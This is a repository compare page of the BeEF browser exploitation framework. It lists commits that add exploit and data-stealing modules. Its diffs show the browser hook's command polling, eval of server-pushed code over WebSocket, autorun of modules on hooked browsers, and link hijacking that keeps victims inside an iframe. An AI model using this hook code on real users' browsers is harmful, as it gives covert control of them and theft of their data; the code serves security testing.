Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

base: Hiddenden:beef-0.4.3.8
Branches Tags
Hiddenden:master Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1
..
compare: Hiddenden:beef-0.4.3.9
Branches Tags
Hiddenden:dependabot/bundler/json-2.19.0 Hiddenden:red/fix_dependabot_automerge Hiddenden:dependabot/bundler/rubocop-1.85.1 Hiddenden:dependabot/bundler/sqlite3-2.9.1 Hiddenden:master Hiddenden:red/fix_xss_module Hiddenden:red/workflow-security-improvements Hiddenden:red/test_all_modules Hiddenden:red/dev Hiddenden:revert-3226-add_enable_auto_merge Hiddenden:update_copyright Hiddenden:wheatley-patch-2 Hiddenden:revert-2594-revert-2590-master Hiddenden:revert-2590-master
Hiddenden:v0.6.0.0 Hiddenden:v0.5.4.0 Hiddenden:v0.5.2.0 Hiddenden:v0.5.3.0 Hiddenden:v0.5.1.0 Hiddenden:v0.5.0.0 Hiddenden:beef-0.4.7.3 Hiddenden:beef-0.4.7.2 Hiddenden:beef-0.4.7.1 Hiddenden:beef-0.4.7.0 Hiddenden:beef-0.4.6.1 Hiddenden:beef-0.4.5.1 Hiddenden:beef-0.4.5.0 Hiddenden:beef-0.4.4.9 Hiddenden:beef-0.4.4.8 Hiddenden:beef-0.4.4.7 Hiddenden:beef-0.4.4.6.1 Hiddenden:beef-0.4.4.6 Hiddenden:beef-0.4.4.5 Hiddenden:beef-0.4.4.4.1 Hiddenden:beef-0.4.4.4 Hiddenden:beef-0.4.4.3 Hiddenden:beef-0.4.4.2.1 Hiddenden:beef-0.4.4.1 Hiddenden:beef-0.4.4.0 Hiddenden:beef-0.4.3.9 Hiddenden:beef-0.4.3.8 Hiddenden:beef-0.4.3.7 Hiddenden:beef-0.4.3.6 Hiddenden:beef-0.4.3.5 Hiddenden:beef-0.4.3.4 Hiddenden:beef-0.4.3.3 Hiddenden:beef-0.4.3.2 Hiddenden:beef-0.4.3.1

27 Commits
beef-0.4.3 ... beef-0.4.3

Author SHA1 Message Date
bcoles
acb09efd32 Fixed a few typos in BeEFLive.sh 
Moved avant_steal_history module to 'browser' category
 2012-12-10 23:59:45 +10:30
ben-waugh
d3cb14b1ad Added Live CD Login Script 
Fixes #775 #766
 2012-12-07 10:39:05 +10:00
Michele Orru
4d097aa55d Merge pull request #773 from malerisch/avant_browser 
Avant Browser History Stealing
 2012-12-05 15:39:00 -08:00
bcoles
75532ffe44 Add PHP 5.3.9 DoS (CVE-2012-0830) module 
Has not been tested
 2012-11-29 18:34:07 +10:30
Roberto Suggi Liverani
9546e88113 Avant Browser History Stealing 
Avant Browser History Stealing module - Advisory:
http://blog.malerisch.net/2012/11/avant-browser-same-of-origin-policy.html
 2012-11-28 14:11:04 +13:00
bcoles
9083586135 Updated supported browser list for CORS debug module 2012-11-26 16:38:07 +10:30
bcoles
3152f41a18 Add beef.net.cors.request 
Returns a response object with HTTP status, headers and body

Add 'Test CORS Request' debug module
 2012-11-26 02:50:27 +10:30
antisnatchor
da08911080 Added '/multi_module' RESTful API call to send multiple modules at once to a single browser. 2012-11-25 13:47:29 +00:00
antisnatchor
b050af529f Removed console.log from read_gmail module. Some browser do not support that. 2012-11-25 11:52:54 +00:00
antisnatchor
efec8b9bc3 Clarified with code comments (main config.yaml) how to add mysql/postgres dependencies if switching database drivers. 2012-11-22 14:26:12 +00:00
antisnatchor
d580ff44ed Merge branch 'master' of https://github.com/beefproject/beef 2012-11-21 13:39:28 +00:00
antisnatchor
328df7af97 Documented (JSdoc) both updater.js and websocket.js. Finally :D 2012-11-21 07:12:56 +00:00
antisnatchor
4b6130a315 Added xhr_poll_timeout config to the main config.yaml. This can now be used to decrease/increase polling timeout for the normal XHR-polling communication. 2012-11-21 06:37:41 +00:00
antisnatchor
011bb0e94b Refactored WebSocket polling timeout config value. 2012-11-21 06:26:15 +00:00
antisnatchor
72a4a127ff Documented (JSdoc) all the net.js methods. 2012-11-21 06:14:59 +00:00
antisnatchor
03f7f888b5 Documented (JSdoc) all the init.js methods. 2012-11-21 06:13:32 +00:00
antisnatchor
2ae03736ab Added Chrome 23 detection. Refactored the hasWebSockets method. 2012-11-21 05:19:47 +00:00
antisnatchor
c2185d2cec Refactoring session.js moving the iframe persistence technique in dom.js. Updated iframe_above to use the new component. 2012-11-21 05:10:52 +00:00
Mike Haworth
624f704240 added module to pull email messages content from gmails atom feed, useful if running the in context of mail.google.com 2012-11-20 20:46:04 +13:00
Michele Orru
1765d18d97 Merge pull request #765 from gallypette/master 
Change hardcoded linked image to an inline one in credential.js template
 2012-11-19 23:18:12 -08:00
Jean-Louis Huynen
6e44d5c641 remove hardcoded linked image to an inline one in credential.js template- (this template need some work btw) 2012-11-19 11:14:24 +01:00
antisnatchor
81f03f0024 Fixed a nasty bug with WebSockets. BrowserDetails are now always sent with XHR-polling, before switching protocols using WebSockets. 2012-11-18 15:45:46 +00:00
bcoles
05e31fd250 Add Zenoss 3.x command execution exploit 2012-11-11 21:40:50 +10:30
antisnatchor
bcb0e55802 Merge branch 'master' of https://github.com/beefproject/beef 2012-11-05 19:33:08 +00:00
antisnatchor
bbf7143a9a Modified Autorun to work with modules with USER_NOTIFY target. Also added a few config options in the main config.yaml. 2012-11-05 19:32:34 +00:00
bcoles
f5b4a413f6 Added WAN Emulator command execution exploit 2012-11-04 17:37:42 +10:30
bcoles
014aa3c4bd Version updated to 0.4.3.9-alpha 
your changes. Lines starting
 2012-11-02 18:26:04 +10:30
35 changed files with 1010 additions and 139 deletions
Expand all files Collapse all files

110
BeEFLive.sh Normal file
View File

@@ -0,0 +1,110 @@
#!/bin/bash
#
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'home/beef/doc/COPYING' for copying permission
#
#
# This is the auto startup script for the BeEF Live CD.
# IT SHOULD ONLY BE RUN ON THE LIVE CD
# Download LiveCD here: https://github.com/beefproject/beef/downloads
#
# This script contains a few fixes to make BeEF play nicely with the way
# remastersys creates the live cd distributable as well as generating host keys
# to enable SSH etc. The script also make it easy for the user to update/start
# the BeEF server
#
clear
echo "======================================"
echo " BeEF Live CD "
echo "======================================"
echo ""
echo "Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net"
echo "Browser Exploitation Framework (BeEF) - http://beefproject.com"
echo "See the file 'home/beef/doc/COPYING' for copying permission"
echo ""
echo "Welcome to the BeEF Live CD"
echo ""
echo ""
#
# Check for SSH Host Keys - if they do not exist ask user if they should be
# created (remastersys has a habit of deleting them during Live CD Creation)
#
f1="/etc/ssh/ssh_host_rsa_key"
if [ -f $f1 ]
then
echo ""
else
echo -n "Would you like to enable ssh (y/N)? "
read var
if [ $var = "y" ] ; then
sudo ssh-keygen -t rsa -f /etc/ssh/ssh_host_rsa_key -N ''
sudo ssh-keygen -t dsa -f /etc/ssh/ssh_host_dsa_key -N ''
echo ""
echo "Please provide a password for ssh user: beef"
sudo passwd beef
echo "ssh enabled"
fi
fi
echo ""
#
# Prompt the user if they would like to update BeEF and
# other components installed (such as sqlmap and msf)
#
echo -n "Check and install updates for BeEF (y/N)? "
read var
if [ $var = "y" ] ; then
cd /opt/beef
git stash
git pull
fi
echo ""
echo -n "Check and install updates for msf and sqlmap (y/N)? "
read var
if [ $var = "y" ] ; then
cd /opt/sqlmap
git stash
git pull
cd /opt/metasploit-framework
git stash
git pull
fi
#
# Create a shortcut in the user's home folder to BeEF, msf and sqlmap
# (if they do not yet exist)
#
f1="beef"
if [ -f $f1 ] ; then
echo ""
else
ln -s /opt/beef/ beef
ln -s /opt/metasploit-framework/ msf
ln -s /opt/sqlmap/ sqlmap
fi
#
# Prompt the user if they would like start BeEF
#
echo -n "Start BeEF (y/N)? "
read var
if [ $var = "y" ] ; then
echo ""
echo "Starting BeEF..";
cd /opt/beef
ruby beef -x
fi

2
VERSION
View File

@@ -4,4 +4,4 @@
# See the file 'doc/COPYING' for copying permission
#
0.4.3.8-alpha
0.4.3.9-alpha

23
config.yaml
View File

@@ -6,7 +6,7 @@
# BeEF Configuration file
beef:
version: '0.4.3.8-alpha'
version: '0.4.3.9-alpha'
debug: false
restrictions:
@@ -20,6 +20,10 @@ beef:
debug: false #Thin::Logging.debug, very verbose. Prints also full exception stack trace.
host: "0.0.0.0"
port: "3000"
# Decrease this setting up to 1000 if you want more responsiveness when sending modules and retrieving results.
# It's not advised to decrease it with tons of hooked browsers (more than 50),
# because it might impact performance. Also, enable WebSockets is generally better.
xhr_poll_timeout: 5000
# if running behind a nat set the public ip address here
#public: ""
#public_port: "" # port setting is experimental
@@ -34,8 +38,8 @@ beef:
enable: false
secure: true # use WebSocketSecure work only on https domain and whit https support enabled in BeEF
port: 61985 # WS: good success rate through proxies
secure_port: 61986 # WSS
alive_timer: 1000 # poll BeEF every second
secure_port: 61986 # WSSecure
ws_poll_timeout: 1000 # poll BeEF every second
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
web_server_imitation:
@@ -55,6 +59,12 @@ beef:
# README.databases file
# supported DBs: sqlite, mysql, postgres
# NOTE: you must change the Gemfile adding a gem require line like:
# gem "dm-postgres-adapter"
# or
# gem "dm-mysql-adapter"
# if you want to switch drivers from sqlite to postgres (or mysql).
# Finally, run a 'bundle install' command and start BeEF.
driver: "sqlite"
# db_file is only used for sqlite
@@ -72,6 +82,13 @@ beef:
user: "beef"
passwd: "beef"
# Autorun modules as soon the browser is hooked.
# NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
autorun:
enable: true
# set this to FALSE if you don't want to allow auto-run execution for modules with target->user_notify
allow_user_notify: true
crypto_default_value_length: 80
# You may override default extension configuration parameters here

4
core/main/client/beef.js
View File

@@ -6,13 +6,11 @@
/*!
* BeEF JS Library <%= @beef_version %>
* http://beef.googlecode.com/
* Register the BeEF JS on the window object.
*/
$j = jQuery.noConflict();
//<%= @beef_hook_session_name %>='<%= @beef_hook_session_id %>';
if(typeof beef === 'undefined' && typeof window.beef === 'undefined') {
var BeefJS = {

17
core/main/client/browser.js
View File

@@ -389,12 +389,20 @@ beef.browser = {
return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==22)?true:false);
},
/**
* Returns true if Chrome 23.
* @example: beef.browser.isC23()
*/
isC23: function() {
return (!!window.chrome && !window.webkitPerformance) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10)==23)?true:false);
},
/**
* Returns true if Chrome.
* @example: beef.browser.isC()
*/
isC: function() {
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22();
return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16()|| this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23();
},
/**
@@ -472,6 +480,7 @@ beef.browser = {
C20: this.isC20(), // Chrome 20
C21: this.isC21(), // Chrome 21
C22: this.isC22(), // Chrome 22
C23: this.isC23(), // Chrome 23
C: this.isC(), // Chrome any version
FF2: this.isFF2(), // Firefox 2
@@ -540,8 +549,9 @@ beef.browser = {
if (this.isC20()) { return '20' }; // Chrome 20
if (this.isC21()) { return '21' }; // Chrome 21
if (this.isC22()) { return '22' }; // Chrome 22
if (this.isC23()) { return '23' }; // Chrome 23
if (this.isFF2()) { return '2' }; // Firefox 2
if (this.isFF2()) { return '2' }; // Firefox 2
if (this.isFF3()) { return '3' }; // Firefox 3
if (this.isFF3_5()) { return '3.5'}; // Firefox 3.5
if (this.isFF3_6()) { return '3.6'}; // Firefox 3.6
@@ -697,7 +707,6 @@ beef.browser = {
} catch(e) {
return false;
}
return false;
},
/**
@@ -965,7 +974,7 @@ beef.browser = {
* In FF6+ the websocket object has been prefixed with Moz, so now it's called MozWebSocket
* */
hasWebSocket: function() {
if (!!window.WebSocket || !!window.MozWebSocket) return true; else return false;
return !!window.WebSocket || !!window.MozWebSocket;
},
/**

19
core/main/client/dom.js
View File

@@ -108,6 +108,25 @@ beef.dom = {
}
return iframe;
},
/**
* Load the link (href value) in an overlay foreground iFrame.
* The BeEF hook continues to run in background.
* NOTE: if the target link is returning X-Frame-Options deny/same-origin or uses
* Framebusting techniques, this will not work.
*/
persistentIframe: function(){
$j('a').click(function(e) {
if ($j(this).attr('href') != '')
{
e.preventDefault();
beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
$j(document).attr('title', $j(this).html());
document.body.scroll = "no";
document.documentElement.style.overflow = 'hidden';
}
});
},
/**
* Create a form element with the specified parameters, appending it to the DOM if append == true

26
core/main/client/init.js
View File

@@ -4,11 +4,15 @@
// See the file 'doc/COPYING' for copying permission
//
// if beef.pageIsLoaded is true, then this JS has been loaded >1 times
// and will have a new session id. The new session id will need to know
// the brwoser details. So sendback the browser details again.
/**
* @literal object: beef.init
* Contains the beef_init() method which starts the BeEF client-side
* logic. Also, it overrides the 'onpopstate' and 'onclose' events on the windows object.
*
* If beef.pageIsLoaded is true, then this JS has been loaded >1 times
* and will have a new session id. The new session id will need to know
* the brwoser details. So sendback the browser details again.
*/
BEEFHOOK = beef.session.get_hook_session_id();
if (beef.pageIsLoaded) {
@@ -49,6 +53,13 @@ window.onclose = function (event) {
}
};
/**
* Starts the polling mechanism, and initialize various components:
* - browser details (see browser.js) are sent back to the "/init" handler
* - the polling starts (checks for new commands, and execute them)
* - the logger component is initialized (see logger.js)
* - the Autorun Engine is initialized (see are.js)
*/
function beef_init() {
if (!beef.pageIsLoaded) {
beef.pageIsLoaded = true;
@@ -58,15 +69,12 @@ function beef_init() {
beef.updater.execute_commands();
beef.logger.start();
beef.are.init();
}
else {
}else {
beef.net.browser_details();
beef.updater.execute_commands();
beef.updater.check();
beef.logger.start();
beef.are.init();
}
}
}

107
core/main/client/net.js
View File

@@ -7,7 +7,14 @@
/*!
* @literal object: beef.net
*
* Provides basic networking functions.
* Provides basic networking functions,
* like beef.net.request and beef.net.forgeRequest,
* used by BeEF command modules and the Requester extension,
* as well as beef.net.send which is used to return commands
* to BeEF server-side components.
*
* Also, it contains the core methods used by the XHR-polling
* mechanism (flush, queue)
*/
beef.net = {
@@ -21,7 +28,10 @@ beef.net = {
sid_count:0,
cmd_queue:[],
//Command object
/**
* Command object. This represents the data to be sent back to BeEF,
* using the beef.net.send() method.
*/
command:function () {
this.cid = null;
this.results = null;
@@ -29,13 +39,17 @@ beef.net = {
this.callback = null;
},
//Packet object
/**
* Packet object. A single chunk of data. X packets -> 1 stream
*/
packet:function () {
this.id = null;
this.data = null;
},
//Stream object
/**
* Stream object. Contains X packets, which are command result chunks.
*/
stream:function () {
this.id = null;
this.packets = [];
@@ -51,7 +65,8 @@ beef.net = {
/**
* Response Object - used in the beef.net.request callback
* Note: as we are using async mode, the response object will be empty if returned.Using sync mode, request obj fields will be populated.
* NOTE: as we are using async mode, the response object will be empty if returned.
* Using sync mode, request obj fields will be populated.
*/
response:function () {
this.status_code = null; // 500, 404, 200, 302
@@ -64,7 +79,13 @@ beef.net = {
this.headers = null; // full response headers
},
//Queues the command, to be sent back to the framework on the next refresh
/**
* Queues the specified command results.
* @param: {String} handler: the server-side handler that will be called
* @param: {Integer} cid: command id
* @param: {String} results: the data to send
* @param: {Function} callback: the function to call after execution
*/
queue:function (handler, cid, results, callback) {
if (typeof(handler) === 'string' && typeof(cid) === 'number' && (callback === undefined || typeof(callback) === 'function')) {
var s = new beef.net.command();
@@ -76,26 +97,40 @@ beef.net = {
}
},
//Queues the current command and flushes the queue straight away
/**
* Queues the current command results and flushes the queue straight away.
* NOTE: Always send Browser Fingerprinting results
* (beef.net.browser_details(); -> /init handler) using normal XHR-polling,
* even if WebSockets are enabled.
* @param: {String} handler: the server-side handler that will be called
* @param: {Integer} cid: command id
* @param: {String} results: the data to send
* @param: {Function} callback: the function to call after execution
*/
send:function (handler, cid, results, callback) {
if (typeof beef.websocket === "undefined") {
if (typeof beef.websocket === "undefined" || (handler === "/init" && cid == 0)) {
this.queue(handler, cid, results, callback);
this.flush();
}
else {
}else {
try {
beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
'", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
'","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
}
catch (e) {
}catch (e) {
this.queue(handler, cid, results, callback);
this.flush();
}
}
}
},
//Flush all currently queued commands to the framework
/**
* Flush all currently queued command results to the framework,
* chopping the data in chunks ('chunk' method) which will be re-assembled
* server-side by the network stack.
* NOTE: currently 'flush' is used only with the default
* XHR-polling mechanism. If WebSockets are used, the data is sent
* back to BeEF straight away.
*/
flush:function () {
if (this.cmd_queue.length > 0) {
var data = beef.encode.base64.encode(beef.encode.json.stringify(this.cmd_queue));
@@ -119,13 +154,21 @@ beef.net = {
}
},
//Split string into chunk lengths determined by amount
/**
* Split the input data into chunk lengths determined by the amount parameter.
* @param: {String} str: the input data
* @param: {Integer} amount: chunk length
*/
chunk:function (str, amount) {
if (typeof amount == 'undefined') n = 2;
return str.match(RegExp('.{1,' + amount + '}', 'g'));
},
//Push packets to framework
/**
* Push the input stream back to the BeEF server-side components.
* It uses beef.net.request to send back the data.
* @param: {Object} stream: the stream object to be sent back.
*/
push:function (stream) {
//need to implement wait feature here eventually
for (var i = 0; i < stream.pc; i++) {
@@ -134,7 +177,7 @@ beef.net = {
},
/**
*Performs http requests
* Performs http requests
* @param: {String} scheme: HTTP or HTTPS
* @param: {String} method: GET or POST
* @param: {String} domain: bindshell.net, 192.168.3.4, etc
@@ -193,13 +236,12 @@ beef.net = {
data:data,
timeout:(timeout * 1000),
//needed otherwise jQuery always add Content-type: application/xml, even if data is populated
//This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
beforeSend:function (xhr) {
if (method == "POST") {
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
}
},
success:function (data, textStatus, xhr) {
var end_time = new Date().getTime();
response.status_code = xhr.status;
@@ -240,9 +282,11 @@ beef.net = {
},
/*
* Similar to this.request, except from a few things that are needed when dealing with forged requests:
* Similar to beef.net.request, except from a few things that are needed when dealing with forged requests:
* - requestid: needed on the callback
* - allowCrossDomain: set cross-domain requests as allowed or blocked
*
* forge_request is used mainly by the Requester and Tunneling Proxy Extensions.
*/
forge_request:function (scheme, method, domain, port, path, anchor, headers, data, timeout, dataType, allowCrossDomain, requestid, callback) {
@@ -285,14 +329,21 @@ beef.net = {
return response;
}
// build and execute the request
if (method == "POST") {
/*
* according to http://api.jquery.com/jQuery.ajax/, Note: having 'script':
* This will turn POSTs into GETs for remote-domain requests.
*/
if (method == "POST"){
$j.ajaxSetup({
data:data
dataType: dataType
});
} else {
$j.ajaxSetup({
dataType: 'script'
});
}
// this is required for bugs in IE so data can be transfered back to the server
// this is required for bugs in IE so data can be transferred back to the server
if ( beef.browser.isIE() ) {
dataType = 'script'
}
@@ -303,9 +354,7 @@ beef.net = {
headers: headers,
timeout: (timeout * 1000),
// needed otherwise jQuery always adds:
// Content-type: application/xml
// even if data is populated
//This is needed, otherwise jQuery always add Content-type: application/xml, even if data is populated.
beforeSend:function (xhr) {
if (method == "POST") {
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded; charset=utf-8");
@@ -407,7 +456,9 @@ beef.net = {
return false;
},
//Sends back browser details to framework
/**
* Sends back browser details to framework, calling beef.browser.getDetails()
*/
browser_details:function () {
var details = beef.browser.getDetails();
details['HookSessionID'] = beef.session.get_hook_session_id();

77
core/main/client/net/cors.js Normal file
View File

@@ -0,0 +1,77 @@
beef.net.cors = {
handler: "cors",
/**
* Response Object - used in the beef.net.request callback
*/
response:function () {
this.status = null; // 500, 404, 200, 302, etc
this.headers = null; // full response headers
this.body = null; // full response body
},
/**
* Make a cross-domain request using CORS
*
* @param method {String} HTTP verb ('GET', 'POST', 'DELETE', etc.)
* @param url {String} url
* @param data {String} request body
* @param callback {Function} function to callback on completion
*/
request: function(method, url, data, callback) {
var xhr;
var response = new this.response;
if (XMLHttpRequest) {
xhr = new XMLHttpRequest();
if ('withCredentials' in xhr) {
xhr.open(method, url, true);
xhr.onerror = function() {
};
xhr.onreadystatechange = function() {
if (xhr.readyState === 4) {
response.headers = this.getAllResponseHeaders()
response.body = this.responseText;
response.status = this.status;
if (!!callback) {
if (!!response) {
callback(response);
} else {
callback('ERROR: No Response. CORS requests may be denied for this resource.')
}
}
}
};
xhr.send(data);
}
} else if (typeof XDomainRequest != "undefined") {
xhr = new XDomainRequest();
xhr.open(method, url);
xhr.onerror = function() {
};
xhr.onload = function() {
response.headers = this.getAllResponseHeaders()
response.body = this.responseText;
response.status = this.status;
if (!!callback) {
if (!!response) {
callback(response);
} else {
callback('ERROR: No Response. CORS requests may be denied for this resource.')
}
}
};
xhr.send(data);
} else {
if (!!callback) callback('ERROR: Not Supported. CORS is not supported by the browser. The request was not sent.');
}
}
};
beef.regCmp('beef.net.cors');

19
core/main/client/session.js
View File

@@ -68,26 +68,7 @@ beef.session = {
}
return hook_session_id;
},
/**
* Overrides each link, and creates an iframe (loading the href) instead of following the link
*/
persistent: function() {
$j('a').click(function(e) {
if ($j(this).attr('href') != '')
{
e.preventDefault();
beef.dom.createIframe('fullscreen', 'get', {'src':$j(this).attr('href')}, {}, null);
$j(document).attr('title', $j(this).html());
document.body.scroll = "no";
document.documentElement.style.overflow = 'hidden';
}
});
}
};
beef.regCmp('beef.session');

30
core/main/client/updater.js
View File

@@ -8,13 +8,13 @@
* @Literal object: beef.updater
*
* Object in charge of getting new commands from the BeEF framework and execute them.
* The XHR-polling channel is managed here. If WebSockets are enabled,
* websocket.ls is used instead.
*/
beef.updater = {
// Low timeouts combined with the way the framework sends commamd modules result
// in instructions being sent repeatedly or complex code.
// If you suffer from ADHD, you can decrease this setting.
timeout: 5000,
// XHR-polling timeout.
xhr_poll_timeout: "<%= @xhr_poll_timeout %>",
// A lock.
lock: false,
@@ -42,22 +42,22 @@ beef.updater = {
beef.net.flush();
if(beef.commands.length > 0) {
this.execute_commands();
}
else {
}else {
this.get_commands(); /*Polling*/
}
}
// ( typeof beef.websocket === "undefined")
setTimeout("beef.updater.check();", beef.updater.timeout);
setTimeout("beef.updater.check();", beef.updater.xhr_poll_timeout);
},
// Gets new commands from the framework.
get_commands: function(http_response) {
/**
* Gets new commands from the framework.
*/
get_commands: function() {
try {
this.lock = true;
beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 1, 'script', function(response) {
beef.net.request(beef.net.httpproto, 'GET', beef.net.host, beef.net.port, beef.net.hook, null, 'BEEFHOOK='+beef.session.get_hook_session_id(), 5, 'script', function(response) {
if (response.body != null && response.body.length > 0)
beef.updater.execute_commands();
});
@@ -68,13 +68,12 @@ beef.updater = {
this.lock = false;
},
// Executes the received commands if any.
/**
* Executes the received commands, if any.
*/
execute_commands: function() {
if(beef.commands.length == 0) return;
this.lock = true;
/*here execute the command */
while(beef.commands.length > 0) {
command = beef.commands.pop();
try {
@@ -83,7 +82,6 @@ beef.updater = {
console.error('execute_commands - command failed to execute: ' + e.message);
}
}
this.lock = false;
}
};

84
core/main/client/websocket.js
View File

@@ -5,72 +5,86 @@
//
//beef.websocket.socket.send(take answer to server beef)
/*New browser init call this */
/**
* @Literal object: beef.websocket
*
* Manage the WebSocket communication channel.
* This channel is much faster and responsive, and it's used automatically
* if the browser supports WebSockets AND beef.http.websocket.enable = true.
*/
beef.websocket = {
socket:null,
alive_timer:<%= @websocket_timer %>,
ws_poll_timeout: "<%= @ws_poll_timeout %>",
/**
* Initialize the WebSocket client object.
* Note: use WebSocketSecure only if the hooked domain is under https.
* Mixed-content in WS is quite different from a non-WS context.
*/
init:function () {
var webSocketServer = beef.net.host;
var webSocketPort = <%= @websocket_port %>;
var webSocketSecure = <%= @websocket_secure %>;
var webSocketPort = "<%= @websocket_port %>";
var webSocketSecure = "<%= @websocket_secure %>";
var protocol = "ws://";
//console.log("We are inside init");
/*use wss only if hooked domain is under https. Mixed-content in WS is quite different from a non-WS context*/
if(webSocketSecure && window.location.protocol=="https:"){
protocol = "wss://";
webSocketPort= <%= @websocket_sec_port %>;
webSocketPort= "<%= @websocket_sec_port %>";
}
if (beef.browser.isFF() && !!window.MozWebSocket) {
beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
} else {
beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
if (beef.browser.isFF() && !!window.MozWebSocket) {
beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
}else{
beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
}
},
/* send Helo message to the BeEF server and start async communication*/
/**
* Send Helo message to the BeEF server and start async polling.
*/
start:function () {
new beef.websocket.init();
this.socket.onopen = function () {
//console.log("Socket has been opened!");
/*send browser id*/
beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
//console.log("Connected and Helo");
beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
beef.websocket.alive();
}
};
this.socket.onmessage = function (message) {
//console.log("Received message via WS."+ message.data);
//todo: double-check if there is a way to don't use eval here. It's not a big deal,
//todo: because the eval'ed data comes from BeEF itself, so is implicitly trusted.
eval(message.data);
}
};
this.socket.onclose = function () {
setTimeout(function(){beef.websocket.start()}, 5000);
}
setTimeout(function(){beef.websocket.start()}, 5000);
};
},
/**
* Send data back to BeEF. This is basically the same as beef.net.send,
* but doesn't queue commands.
* Example usage:
* beef.websocket.send('{"handler" : "' + handler + '", "cid" :"' + cid +
* '", "result":"' + beef.encode.base64.encode(beef.encode.json.stringify(results)) +
* '","callback": "' + callback + '","bh":"' + beef.session.get_hook_session_id() + '" }');
*/
send:function (data) {
try {
this.socket.send(data);
//console.log("Sent [" + data + "]");
}
catch(err){
//console.log(err);
}
this.socket.send(data);
}catch(err){}
},
/**
* Polling mechanism, to notify the BeEF server that the browser is still hooked,
* and the WebSocket channel still alive.
* todo: there is probably a more efficient way to do this. Double-check WebSocket API.
*/
alive: function (){
beef.websocket.send('{"alive":"'+beef.session.get_hook_session_id()+'"}');
// console.log("sent alive");
setTimeout("beef.websocket.alive()", beef.websocket.alive_timer);
setTimeout("beef.websocket.alive()", beef.websocket.ws_poll_timeout);
}
};

31
core/main/handlers/browserdetails.rb
View File

@@ -24,6 +24,9 @@ module BeEF
end
def setup()
print_debug "[INIT] Processing Browser Details..."
config = BeEF::Core::Configuration.instance
# validate hook session value
session_id = get_param(@data, 'beefhook')
(self.err_msg "session id is invalid"; return) if not BeEF::Filters.is_valid_hook_session_id?(session_id)
@@ -273,19 +276,25 @@ module BeEF
# Call autorun modules
autorun = []
BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|
if v.has_key?('autorun') and v['autorun'] == true
if BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name}) == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
BeEF::Module.execute(k, session_id)
autorun.push(k)
else
print_debug "Autorun attempted to execute unsupported module '#{k}' against Hooked browser #{zombie.ip}"
if config.get('beef.autorun.enable')
autorun = []
BeEF::Core::Configuration.instance.get('beef.module').each { |k, v|
if v.has_key?('autorun') and v['autorun'] == true
target_status = BeEF::Module.support(k, {'browser' => browser_name, 'ver' => browser_version, 'os' => os_name})
if target_status == BeEF::Core::Constants::CommandModule::VERIFIED_WORKING
BeEF::Module.execute(k, session_id)
autorun.push(k)
elsif target_status == BeEF::Core::Constants::CommandModule::VERIFIED_USER_NOTIFY and config.get('beef.autorun.allow_user_notify')
BeEF::Module.execute(k, session_id)
autorun.push(k)
else
